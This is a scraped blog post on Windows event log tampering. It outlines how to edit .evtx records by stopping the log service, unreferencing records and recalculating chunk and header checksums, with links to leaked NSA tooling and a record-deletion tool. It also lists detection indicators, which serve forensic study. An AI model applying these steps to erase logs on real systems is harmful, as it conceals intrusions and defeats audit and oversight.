Event Log Tampering Part 2: Manipulating Individual Event Logs

  • Evtx Structure & Manual Event Editing (A must-read to understand the following sections)
  • Event Record Unreferencing (Shadow Brokers leak of NSA’s DanderSpritz/eventlogedit)
  • Rewriting Logs with WinAPI EvtExportLog (3gstudent’s evolutions of eventlogedit)

Manipulating Individual Event Logs

  1. Stop the Event log service and copy the .evtx
  2. Modify your events
Updated Event Record Checksum in Chunk Header
  • Service Control Manager Event ID 7035
  • Command-line usage of Service manipulation (sc.exe)
  • File access to the .evtx itself (moving, copying or accessing)

Event Record Unreferencing

https://blog.fox-it.com/2017/12/08/detection-and-recovery-of-nsas-covered-up-tracks/
Concept explained with dogs :)
  1. Edit the size of the previous Event Record to hide the target record
  2. (Can be skipped technically, but will leave a trace of EventRecordIds not in sequence) Update all subsequent Event Record IDs (this means all subsequent chunks now need their checksums recalculated)
  3. Update and recalculate the following in the Chunk Header
    - Last event record number
    - Last event record identifier
    - Last event record data offset
    - Event Record checksum
    - Chunk Header Checksum
  4. Update and recalculate the following in the File Header
    - Next Record Identifier (eg -1 if deleted one event)
    - File Header Checksum

Rewriting Logs with WinAPI EvtExportLog

https://docs.microsoft.com/en-gb/windows/win32/api/winevt/nf-winevt-evtexportlog
https://github.com/3gstudent/Eventlogedit-evtx--Evolution/blob/master/DeleteRecord-EvtExportLog.cpp

Covering All Bases

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

[Hello World!] — Simulation

Cloud analytics at scale with cloud data warehouse: A look at the top players

Compute Sevices for AWS Solutions Architect Associate Guide

Google Cloud Build + Google App Engine: How to add environmental variables and use in Python

Why project-based learning is the BEST [Web Development]

Building an Online Store

How to start Symbol harvesting (staking) on the desktop wallet

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
svch0st

svch0st

Know How to Use Velero to Backup and Migrate Kubernetes Resources and Persistent Volumes

How to install Chocolatey in windows- DevOps Champ

VirtualMachineInstance ReplicaSet in Openshift Container Platform (OCP)

How To Install Prometheus On Ubuntu 20.04 With Let’s Encrypt SSL And Authentication